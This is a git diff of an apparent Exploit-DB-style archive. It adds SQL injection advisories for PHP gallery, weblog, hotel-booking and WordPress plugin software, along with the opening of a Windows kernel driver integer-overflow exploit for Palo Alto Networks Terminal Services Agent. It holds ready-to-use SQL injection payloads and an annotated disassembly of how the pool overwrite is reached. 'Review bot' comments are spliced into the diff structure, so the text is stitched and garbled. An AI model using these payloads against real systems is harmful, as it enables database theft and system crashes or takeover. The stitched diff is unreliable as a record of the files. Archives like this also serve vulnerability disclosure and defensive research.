diff --git a/files.csv b/files.csv
index e1d96f901..886e1f94e 100644
--- a/files.csv
+++ b/files.csv
@@ -8771,6 +8771,7 @@ id,file,description,date,author,platform,type,port
 41158,platforms/linux/local/41158.txt,"Man-db 2.6.7.1 - Privilege Escalation (PoC)",2015-12-02,halfdog,linux,local,0
 41171,platforms/linux/local/41171.txt,"Systemd 228 - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0
 41173,platforms/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation",2017-01-26,"Federico Bento",linux,local,0
+41176,platforms/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -37108,3 +37109,8 @@ id,file,description,date,author,platform,type,port
 41170,platforms/hardware/webapps/41170.txt,"TM RG4332 Wireless Router - Arbitrary File Disclosure",2017-01-26,"Saeid Atabaki",hardware,webapps,0
 41172,platforms/php/webapps/41172.txt,"PHPBack < 1.3.1 - SQL Injection / Cross-Site Scripting",2017-01-26,"Manish Tanwar",php,webapps,0
 41175,platforms/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",hardware,webapps,0
+41177,platforms/php/webapps/41177.txt,"My Photo Gallery 1.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
+41178,platforms/php/webapps/41178.txt,"Maian Weblog 4.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
+41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0
+41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
+41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/41177.txt b/platforms/php/webapps/41177.txt
new file mode 100755
index 000000000..f41fc5d61
--- /dev/null
+++ b/platforms/php/webapps/41177.txt
@@ -0,0 +1,30 @@
+Introduction
+
+Exploit Title: My Photo Gallery – SQL Injection
+Date: 27.01.2017
+Vendor Homepage: http://software.friendsinwar.com/
+Software Link: http://software.friendsinwar.com/news.php?readmore=40
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+My Photo Gallery is a free is a user-friendly picture gallery script.
+Users can register and upload their images to the site. A moderator can see the images and validate, edit or delete them.
+The script comes with a very user friendly admin system where you can change and add many things such as: Categories, Images, Edit members, site looks and many more.
+
+Type of vulnerability:
+
+An SQL Injection vulnerability in My Photo Gallery allows attackers to read
+arbitrary administrator data from the database.
+
+Vulnerable Url:
+
+http://locahost/my_photo_gallery/image.php?imgid=[payload]
+Vulnerable parameter : imgid
+Mehod : GET
+
+Payload:
+imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)--
diff --git a/platforms/php/webapps/41178.txt b/platforms/php/webapps/41178.txt
new file mode 100755
index 000000000..db912c34a
--- /dev/null
+++ b/platforms/php/webapps/41178.txt
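Review bot: The affected version is missing from the advisory header: the index entry added in files.csv records `My Photo Gallery 1.0`, but the `Exploit Title:` line in this file carries no version, so a reader of the file alone cannot tell which release was tested. I would add a line `Version: 1.0` (matching the index) under `Date:`, or put the version in the title the way the index does. The same omission applies to 41178, whose index entry says `Maian Weblog 4.0` while the file names no version. Minor wording in both files: `Mehod : GET` should read `Method : GET`, `locahost` in the Vulnerable Url should read `localhost`, and the overview sentence `is a free is a user-friendly` repeats `is a`.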
@@ -0,0 +1,26 @@
+Introduction
+
+Exploit Title: Maian Weblog – SQL Injection
+Date: 27.01.2017
+Vendor Homepage: http://www.maianweblog.com/
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+Simple blog system for your website, Easily add/edit or delete blogs, Allow visitor comments for individual blogs, Optional e-mail notification for webmaster if comments are posted, Edit or delete visitor comments, BB Code, Calendar so visitors can view past archives, Support for multi language files, Show latest blogs/comments on blog page, Uses the Savant template engine.
+
+Type of vulnerability:
+
+An SQL Injection vulnerability in Maian Weblog allows attackers to read
+arbitrary data from the database.
+
+Vulnerable Url:
+
+http://locahost/weblog/blog/2[payload]/second-blog.html
+Mehod : GET
+
+Simple Payload:
+blog/2' AND (SELECT 2995 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(2995=2995,1))),0x717a787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AUvx'='AUvx/q-blog.html
diff --git a/platforms/php/webapps/41180.txt b/platforms/php/webapps/41180.txt
new file mode 100755
index 000000000..d30b5ae76
--- /dev/null
+++ b/platforms/php/webapps/41180.txt
@@ -0,0 +1,38 @@
+# Exploit Title: WP Private Messages 1.0.1 – Plugin WordPress – Sql Injection
+# Exploit Author: Lenon Leite
+# Vendor Homepage: https://wordpress.org/plugins/wp-email-users/
+
+# Software Link: https://wordpress.org/plugins/wp-email-users/
+# Contact: http://twitter.com/lenonleite
+# Website: http://lenonleite.com.br/
+# Category: webapps
+# Version: 1.3.1
+# Tested on: Ubuntu 14.04
+
+1 - Description:
+
+Type user access: is accessible for any registered user
+
+$_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection
+
+http://lenonleite.com.br/blog/2017/01/17/english-wp-email-users-1-4-1-plugin-wordpress-sql-injection/
+
+2 - Proof of Concept:
+
+1 – Login as regular user (created using wp-login.php?action=register):
+
+2 – Using:
+
+
+
+
+3 - Timeline:
+
+- 12/01/2016 – Discovered
+- 13/12/2016 – Vendor not finded
diff --git a/platforms/php/webapps/41181.txt b/platforms/php/webapps/41181.txt
new file mode 100755
index 000000000..05c83975f
--- /dev/null
+++ b/platforms/php/webapps/41181.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Online Hotel Booking System Pro v1.2 - SQL Injection
+# Google Dork: N/A
+# Date: 27.01.2017
+# Vendor Homepage: http://www.bestsoftinc.com/
+# Software Buy: https://codecanyon.net/item/online-hotel-booking-system-pro/4606514
+# Demo: http://envato.bestsoftinc.net/hotel-booking-pro/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/roomtype-details.php?tid=[SQL]
+# E.t.c
+# # # # #
+
diff --git a/platforms/php/webapps/41182.txt b/platforms/php/webapps/41182.txt
new file mode 100755
index 000000000..9a15a739a
--- /dev/null
+++ b/platforms/php/webapps/41182.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Online Hotel Booking System Pro v1.0 (WordPress Plugin) - SQL Injection
+# Google Dork: N/A
+# Date: 27.01.2017
+# Vendor Homepage: http://www.bestsoftinc.com/
+# Software Buy: https://codecanyon.net/item/online-hotel-booking-system-pro-wordpress-plugin/9338914
+# Demo: http://envato.bestsoftinc.net/wp-hotel-pro/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PLUGIN_PATH]/front/roomtype-details.php?tid=[SQL]
+# E.t.c
+# # # # #
diff --git a/platforms/windows/local/41176.c b/platforms/windows/local/41176.c
new file mode 100755
index 000000000..801bd7e9e
--- /dev/null
+++ b/platforms/windows/local/41176.c
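Review bot: The header metadata of 41180 contradicts itself and the index entry added in the files.csv hunk: the title and the files.csv line both say WP Private Messages 1.0.1, but the `# Version: 1.3.1` line gives a different number, and both `# Vendor Homepage` and `# Software Link` point at `https://wordpress.org/plugins/wp-email-users/`, which appears to be a different plugin from the one named in the title. The timeline is also inconsistent on its face, listing `13/12/2016 – Vendor not finded` after a discovery date of `12/01/2016` while the referenced blog post is dated 2017/01/17, which looks like a transposed date or a mixed dd/mm and mm/dd format. I would change the version line to `# Version: 1.0.1` to match the title and the index, point the two plugin URLs at the WP Private Messages plugin page (or state that no vendor page was found), and write the timeline as `Vendor not found` with both dates in one unambiguous format.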
@@ -0,0 +1,141 @@
+/*
+
+Exploit Title - Palo Alto Networks Terminal Services Agent Integer Overflow
+Date - 26th January 2017
+Discovered by - Parvez Anwar (@parvezghh)
+Vendor Homepage - https://www.paloaltonetworks.com/
+Tested Version - 7.0.3-13
+Driver Version - 6.0.7.0 - panta.sys
+Tested on OS - 32bit Windows 7 SP1
+CVE ID - CVE-2017-5329
+Vendor fix url - https://securityadvisories.paloaltonetworks.com/
+ https://securityadvisories.paloaltonetworks.com/Home/Detail/71
+Fixed Version - 7.0.7 and later
+Fixed driver ver - 6.0.8.0
+
+
+Disassembly
+-----------
+
+.text:9A26F0BD loc_9A26F0BD:
+.text:9A26F0BD mov ecx, DeviceObject
+.text:9A26F0C3 mov dword ptr [ecx+1ACh], 0
+.text:9A26F0CD mov edx, DeviceObject
+.text:9A26F0D3 mov eax, [edx+1B8h] ; eax points to our inputted buffer
+.text:9A26F0D9 mov ecx, [eax+14h] ; Takes size to allocate from our inputted buffer 0x04924925
+.text:9A26F0DC imul ecx, 38h ; 0x38 * 0x04924925 = 0x100000018. Wraps round becoming size to allocate 0x18 (Integer Overflow)
+.text:9A26F0DF mov [ebp+NumberOfBytes], ecx ; Copy ecx value 0x18 onto stack
+.text:9A26F0E2 push 44415450h ; Tag (PTAD string used)
+.text:9A26F0E7 mov edx, [ebp+NumberOfBytes] ; Copy size 0x18 to edx
+.text:9A26F0EA push edx ; NumberOfBytes
+.text:9A26F0EB push 0 ; PoolType
+.text:9A26F0ED call ds:ExAllocatePoolWithTag ; If returned null (eax) exits with error cleanly else takes crash path
+.text:9A26F0F3 mov ecx, DeviceObject
+.text:9A26F0F9 mov [ecx+1B0h], eax
+.text:9A26F0FF mov edx, DeviceObject
+.text:9A26F105 cmp dword ptr [edx+1B0h], 0 ; Checks return value. If not null then jumps to our crash path
+.text:9A26F10C jnz short loc_9A26F13C ; Exits with error cleanly if incorrect size value but not crashable value
+
+.text:9A26F13C
+.text:9A26F13C loc_9A26F13C:
+.text:9A26F13C mov ecx, [ebp+NumberOfBytes]
+.text:9A26F13F push ecx ; 0x18 our allocated pool memory
+.text:9A26F140 push 0 ; int, sets allocated memory to 0x00
+.text:9A26F142 mov edx, DeviceObject
+.text:9A26F148 mov eax, [edx+1B0h]
+.text:9A26F14E push eax ; Pointer to our allocated buffer
+.text:9A26F14F call memset
+.text:9A26F154 add esp, 0Ch
+.text:9A26F157 mov [ebp+var_4], 0 ; Null out ebp-4
+.text:9A26F15E jmp short loc_9A26F169
+
+.text:9A26F160 loc_9A26F160:
+.text:9A26F160 mov ecx, [ebp+var_4]
+.text:9A26F163 add ecx, 1 ; Increment counter
+.text:9A26F166 mov [ebp+var_4], ecx ; Store counter value
+
+.text:9A26F169 loc_9A26F169:
+.text:9A26F169 mov edx, DeviceObject
+.text:9A26F16F mov eax, [edx+1B8h] ; eax points to our inputted buffer
+.text:9A26F175 mov ecx, [ebp+var_4] ; Loop counter number
+.text:9A26F178 cmp ecx, [eax+14h] ; Compares our inputted buffer size 0x04924925. Here our
+ ; size is not using the wrapped value so loops till BSOD
+.text:9A26F17B jnb short loc_9A26F19A
+.text:9A26F17D mov edx, [ebp+var_4] ; Counter value
+.text:9A26F180 imul edx, 38h
+.text:9A26F183 mov eax, DeviceObject
+.text:9A26F188 mov ecx, [eax+1B0h] ; Pointer to allocated pool copied to ecx
+.text:9A26F18E lea edx, [ecx+edx+30h] ; pointer+size(0x38*edx)+0x30
+.text:9A26F192 push edx
+.text:9A26F193 call sub_9A26C000 ; Starts overwriting other pool allocations !!!
+.text:9A26F198 jmp short loc_9A26F160
+
+
+
+.text:9A26C000 sub_9A26C000 proc near
+.text:9A26C000
+.text:9A26C000
+.text:9A26C000 arg_0 = dword ptr 8
+.text:9A26C000
+.text:9A26C000 push ebp
+.text:9A26C001 mov ebp, esp
+.text:9A26C003 mov eax, [ebp+arg_0] ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to eax
+.text:9A26C006 mov ecx, [ebp+arg_0] ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to ecx
+.text:9A26C009 mov [eax+4], ecx ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30+4
+.text:9A26C00C mov edx, [ebp+arg_0] ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to edx
+.text:9A26C00F mov eax, [ebp+arg_0] ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to eax
+.text:9A26C012 mov [edx], eax ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30
+.text:9A26C014 pop ebp
+.text:9A26C015 retn 4
+.text:9A26C015 sub_9A26C000 endp
+
+
+
+*/
+
+
+
+#include